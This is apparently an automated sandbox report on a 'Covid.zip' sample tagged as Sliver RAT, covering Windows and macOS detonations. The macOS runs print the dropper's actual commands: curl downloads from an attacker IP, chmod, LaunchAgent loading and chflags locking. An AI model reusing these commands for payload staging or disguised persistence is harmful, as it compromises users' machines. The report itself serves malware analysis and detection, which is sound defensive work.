Malware Analysis Report

2024-11-13 13:23

Sample ID 241107-w9c14sxcjh
Target Covid.zip
SHA256 809631d5c1dfd10a9e185e7ca312eeddcdb46b3ba4afa60ab8cb61accbf3a5fa
Tags
evasion execution exfiltration persistence sliver
score
10/10

Analysis Overview

score
10/10

SHA256

809631d5c1dfd10a9e185e7ca312eeddcdb46b3ba4afa60ab8cb61accbf3a5fa

Threat Level: Known bad

The file Covid.zip was found to be: Known bad.

Malicious Activity Summary

evasion execution exfiltration persistence sliver

Sliver RAT v2

Sliver family

Exfiltration Over Alternative Protocol

Launch Agent

Resource Forking

Enumerates physical storage devices

Launchctl

Suspicious use of SetWindowsHookEx

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-07 18:36

Signatures

Sliver RAT v2

Description Indicator Process Target
N/A N/A N/A N/A

Sliver family

sliver

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-07 18:36

Reported

2024-11-07 18:40

Platform

win11-20241007-en

Max time kernel

93s

Max time network

95s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Covid\covid

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Covid\covid

Network

Country Destination Domain Proto
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-07 18:36

Reported

2024-11-07 18:40

Platform

macos-20241101-en

Max time kernel

69s

Max time network

104s

Command Line

[sh -c sudo /bin/zsh -c "/Users/run/Covid/covid"]

Signatures

N/A

Processes

/bin/sh

[sh -c sudo /bin/zsh -c "/Users/run/Covid/covid"]

/bin/bash

[sh -c sudo /bin/zsh -c "/Users/run/Covid/covid"]

/usr/bin/sudo

[sudo /bin/zsh -c /Users/run/Covid/covid]

/bin/zsh

[/bin/zsh -c /Users/run/Covid/covid]

/Users/run/Covid/covid

[/Users/run/Covid/covid]

/usr/libexec/xpcproxy

[xpcproxy com.apple.WebKit.WebContent.1812A28A-CD94-4C3D-8BD5-FBB8D909FA3F 480]

/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent

[/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent]

/usr/libexec/xpcproxy

[xpcproxy com.apple.ViewBridgeAuxiliary]

/System/Library/PrivateFrameworks/ViewBridge.framework/Versions/A/XPCServices/ViewBridgeAuxiliary.xpc/Contents/MacOS/ViewBridgeAuxiliary

[/System/Library/PrivateFrameworks/ViewBridge.framework/Versions/A/XPCServices/ViewBridgeAuxiliary.xpc/Contents/MacOS/ViewBridgeAuxiliary]

/usr/libexec/xpcproxy

[xpcproxy com.apple.Safari.SafeBrowsing.Service]

/System/Library/PrivateFrameworks/SafariSafeBrowsing.framework/com.apple.Safari.SafeBrowsing.Service

[/System/Library/PrivateFrameworks/SafariSafeBrowsing.framework/com.apple.Safari.SafeBrowsing.Service]

/usr/libexec/xpcproxy

[xpcproxy com.apple.secinitd]

/usr/libexec/secinitd

[/usr/libexec/secinitd]

/usr/libexec/xpcproxy

[xpcproxy com.apple.audio.systemsoundserverd]

/usr/sbin/systemsoundserverd

[/usr/sbin/systemsoundserverd]

/usr/libexec/xpcproxy

[xpcproxy com.apple.pbs]

/System/Library/CoreServices/pbs

[/System/Library/CoreServices/pbs]

/usr/libexec/xpcproxy

[xpcproxy com.apple.audio.AudioComponentRegistrar]

/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar

[/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar -daemon]

/usr/libexec/xpcproxy

[xpcproxy com.apple.nsurlstoraged]

/usr/libexec/nsurlstoraged

[/usr/libexec/nsurlstoraged --privileged]

Network

Country Destination Domain Proto
US 8.8.8.8:53 16-courier.push.apple.com udp
SG 46.137.201.254:8001 tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
GB 172.217.169.42:443 safebrowsing.googleapis.com tcp
US 8.8.8.8:53 lb._dns-sd._udp.0.0.127.10.in-addr.arpa udp

Files

/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C//mds/mdsObject.db

/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C//mds/mdsDirectory.db

/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C/com.apple.Safari.SafeBrowsing/Google/malware,osx,url_expression

/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C/com.apple.Safari.SafeBrowsing/Google/social_engineering,osx,url_expression

/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C/com.apple.Safari.SafeBrowsing/Google/unwanted_software,osx,url_expression

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-07 18:36

Reported

2024-11-07 18:40

Platform

win11-20241007-en

Max time kernel

147s

Max time network

151s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Covid\softwareupdated

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Covid\softwareupdated

Network

Country Destination Domain Proto
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-07 18:36

Reported

2024-11-07 18:40

Platform

macos-20241106-en

Max time kernel

65s

Max time network

148s

Command Line

[sh -c sudo /bin/zsh -c "/Users/run/Covid/softwareupdated"]

Signatures

N/A

Processes

/bin/sh

[sh -c sudo /bin/zsh -c "/Users/run/Covid/softwareupdated"]

/bin/bash

[sh -c sudo /bin/zsh -c "/Users/run/Covid/softwareupdated"]

/usr/bin/sudo

[sudo /bin/zsh -c /Users/run/Covid/softwareupdated]

/bin/zsh

[/bin/zsh -c /Users/run/Covid/softwareupdated]

/Users/run/Covid/softwareupdated

[/Users/run/Covid/softwareupdated]

/usr/libexec/xpcproxy

[xpcproxy com.apple.nsurlstoraged]

/usr/libexec/nsurlstoraged

[/usr/libexec/nsurlstoraged --privileged]

Network

Country Destination Domain Proto
US 8.8.8.8:53 21-courier.push.apple.com udp
SG 46.137.201.254:8888 tcp
US 8.8.8.8:53 lb._dns-sd._udp.0.0.127.10.in-addr.arpa udp
SG 46.137.201.254:8888 tcp

Files

/var/db/nsurlstoraged/dafsaData.bin


Analysis: behavioral5

Detonation Overview

Submitted

2024-11-07 18:36

Reported

2024-11-07 18:40

Platform

win11-20241007-en

Max time kernel

147s

Max time network

154s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Covid\vpn.dmg

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Covid\vpn.dmg

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-07 18:36

Reported

2024-11-07 18:39

Platform

macos-20241101-en

Max time kernel

80s

Max time network

99s

Command Line

[sh -c sudo /bin/zsh -c "open /Volumes/vpn/vpn.app"]

Signatures

Exfiltration Over Alternative Protocol

exfiltration
Description Indicator Process Target
N/A curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated N/A N/A
N/A curl -L http://46.137.201.254/covid -o /Users/run/covid N/A N/A

Launch Agent

persistence

Resource Forking

evasion
Description Indicator Process Target
N/A /bin/bash /Volumes/vpn/vpn.app/Contents/Resources/script N/A N/A

Launchctl

execution
Description Indicator Process Target
N/A launchctl start softwareupdated N/A N/A
N/A launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist N/A N/A

Processes

/bin/sh

[sh -c sudo /bin/zsh -c "open /Volumes/vpn/vpn.app"]

/bin/bash

[sh -c sudo /bin/zsh -c "open /Volumes/vpn/vpn.app"]

/usr/bin/sudo

[sudo /bin/zsh -c open /Volumes/vpn/vpn.app]

/bin/zsh

[/bin/zsh -c open /Volumes/vpn/vpn.app]

/usr/bin/open

[open /Volumes/vpn/vpn.app]

/usr/libexec/xpcproxy

[xpcproxy com.apple.softwareupdate.2324]

/Volumes/vpn/vpn.app/Contents/MacOS/vpn

[/Volumes/vpn/vpn.app/Contents/MacOS/vpn]

/bin/bash

[/bin/bash /Volumes/vpn/vpn.app/Contents/Resources/script]

/usr/bin/uname

[uname -m]

/bin/mkdir

[mkdir /Users/run/.androids]

/usr/bin/curl

[curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated]

/bin/chmod

[chmod a+x /Users/run/.androids/softwareupdated]

/bin/chmod

[chmod 644 /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]

/bin/launchctl

[launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]

/usr/libexec/xpcproxy

[xpcproxy softwareupdated]

/bin/launchctl

[launchctl start softwareupdated]

/Users/run/.androids/softwareupdated

[/Users/run/.androids/softwareupdated]

/usr/bin/chflags

[chflags uchg /Users/run/.androids/softwareupdated]

/usr/bin/curl

[curl -L http://46.137.201.254/covid -o /Users/run/covid]

/Users/run/.androids/softwareupdated

[/Users/run/.androids/softwareupdated -D]

Network

Country Destination Domain Proto
SG 46.137.201.254:80 tcp
US 8.8.8.8:53 e6858.dscx.akamaiedge.net udp
SG 46.137.201.254:80 tcp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-07 18:36

Reported

2024-11-07 18:40

Platform

win11-20241007-en

Max time kernel

147s

Max time network

149s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\vpn.app\Contents\MacOS\vpn

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\vpn.app\Contents\MacOS\vpn

Network

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-07 18:36

Reported

2024-11-07 18:40

Platform

macos-20241106-en

Max time kernel

77s

Max time network

147s

Command Line

[sh -c sudo /bin/zsh -c "/Users/run/vpn.app/Contents/MacOS/vpn"]

Signatures

Exfiltration Over Alternative Protocol

exfiltration
Description Indicator Process Target
N/A curl -L http://46.137.201.254/covid -o /Users/run/covid N/A N/A
N/A curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated N/A N/A

Launch Agent

persistence

Resource Forking

evasion
Description Indicator Process Target
N/A /bin/bash /Users/run/vpn.app/Contents/Resources/script N/A N/A

Launchctl

execution
Description Indicator Process Target
N/A launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist N/A N/A
N/A launchctl start softwareupdated N/A N/A

Processes

/bin/sh

[sh -c sudo /bin/zsh -c "/Users/run/vpn.app/Contents/MacOS/vpn"]

/bin/bash

[sh -c sudo /bin/zsh -c "/Users/run/vpn.app/Contents/MacOS/vpn"]

/usr/bin/sudo

[sudo /bin/zsh -c /Users/run/vpn.app/Contents/MacOS/vpn]

/bin/zsh

[/bin/zsh -c /Users/run/vpn.app/Contents/MacOS/vpn]

/Users/run/vpn.app/Contents/MacOS/vpn

[/Users/run/vpn.app/Contents/MacOS/vpn]

/bin/bash

[/bin/bash /Users/run/vpn.app/Contents/Resources/script]

/usr/bin/uname

[uname -m]

/bin/mkdir

[mkdir /Users/run/.androids]

/usr/bin/curl

[curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated]

/usr/libexec/xpcproxy

[xpcproxy com.apple.nsurlstoraged]

/usr/libexec/nsurlstoraged

[/usr/libexec/nsurlstoraged --privileged]

/bin/chmod

[chmod a+x /Users/run/.androids/softwareupdated]

/bin/chmod

[chmod 644 /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]

/bin/launchctl

[launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]

/usr/libexec/xpcproxy

[xpcproxy softwareupdated]

/Users/run/.androids/softwareupdated

[/Users/run/.androids/softwareupdated -D]

/bin/launchctl

[launchctl start softwareupdated]

/Users/run/.androids/softwareupdated

[/Users/run/.androids/softwareupdated]

/usr/bin/chflags

[chflags uchg /Users/run/.androids/softwareupdated]

/usr/bin/curl

[curl -L http://46.137.201.254/covid -o /Users/run/covid]

Network

Country Destination Domain Proto
SG 46.137.201.254:80 tcp
US 8.8.8.8:53 e6858.dscx.akamaiedge.net udp
SG 46.137.201.254:80 tcp
US 8.8.8.8:53 lb._dns-sd._udp.0.0.127.10.in-addr.arpa udp

Files

/var/db/nsurlstoraged/dafsaData.bin


Analysis: behavioral9

Detonation Overview

Submitted

2024-11-07 18:36

Reported

2024-11-07 18:40

Platform

win11-20241007-en

Max time kernel

91s

Max time network

95s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\vpn.app\Contents\Resources\script

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\vpn.app\Contents\Resources\script

Network

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-07 18:36

Reported

2024-11-07 18:40

Platform

macos-20241106-en

Max time kernel

114s

Max time network

145s

Command Line

[sh -c sudo /bin/zsh -c "/Users/run/vpn.app/Contents/Resources/script"]

Signatures

Exfiltration Over Alternative Protocol

exfiltration
Description Indicator Process Target
N/A curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated N/A N/A
N/A curl -L http://46.137.201.254/covid -o /Users/run/covid N/A N/A

Launch Agent

persistence

Resource Forking

evasion
Description Indicator Process Target
N/A /Users/run/vpn.app/Contents/Resources/script N/A N/A
N/A sh -c "sudo /bin/zsh -c \"/Users/run/vpn.app/Contents/Resources/script\"" N/A N/A
N/A sudo /bin/zsh -c /Users/run/vpn.app/Contents/Resources/script N/A N/A
N/A /bin/zsh -c /Users/run/vpn.app/Contents/Resources/script N/A N/A

Launchctl

execution
Description Indicator Process Target
N/A launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist N/A N/A
N/A launchctl start softwareupdated N/A N/A

Processes

/bin/sh

[sh -c sudo /bin/zsh -c "/Users/run/vpn.app/Contents/Resources/script"]

/bin/bash

[sh -c sudo /bin/zsh -c "/Users/run/vpn.app/Contents/Resources/script"]

/usr/bin/sudo

[sudo /bin/zsh -c /Users/run/vpn.app/Contents/Resources/script]

/bin/zsh

[/bin/zsh -c /Users/run/vpn.app/Contents/Resources/script]

/Users/run/vpn.app/Contents/Resources/script

[/Users/run/vpn.app/Contents/Resources/script]

/usr/bin/uname

[uname -m]

/bin/mkdir

[mkdir /Users/run/.androids]

/usr/bin/curl

[curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated]

/usr/libexec/xpcproxy

[xpcproxy com.apple.nsurlstoraged]

/usr/libexec/nsurlstoraged

[/usr/libexec/nsurlstoraged --privileged]

/bin/chmod

[chmod a+x /Users/run/.androids/softwareupdated]

/bin/chmod

[chmod 644 /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]

/bin/launchctl

[launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]

/usr/libexec/xpcproxy

[xpcproxy softwareupdated]

/bin/launchctl

[launchctl start softwareupdated]

/Users/run/.androids/softwareupdated

[/Users/run/.androids/softwareupdated -D]

/Users/run/.androids/softwareupdated

[/Users/run/.androids/softwareupdated]

/usr/bin/chflags

[chflags uchg /Users/run/.androids/softwareupdated]

/usr/bin/curl

[curl -L http://46.137.201.254/covid -o /Users/run/covid]

/usr/libexec/xpcproxy

[xpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E]

/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService

[/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService]

Network

Country Destination Domain Proto
SG 46.137.201.254:80 tcp
US 8.8.8.8:53 b._dns-sd._udp.0.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 db._dns-sd._udp.0.0.127.10.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 itunes.apple.com udp
GB 23.74.160.23:443 itunes.apple.com tcp
SG 46.137.201.254:80 tcp
US 8.8.8.8:53 lb._dns-sd._udp.0.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 cds.apple.com udp
US 23.192.22.130:443 cds.apple.com tcp
US 8.8.8.8:53 help.apple.com udp
GB 2.23.221.174:443 help.apple.com tcp
GB 2.23.221.174:443 help.apple.com tcp

Files

/var/db/nsurlstoraged/dafsaData.bin
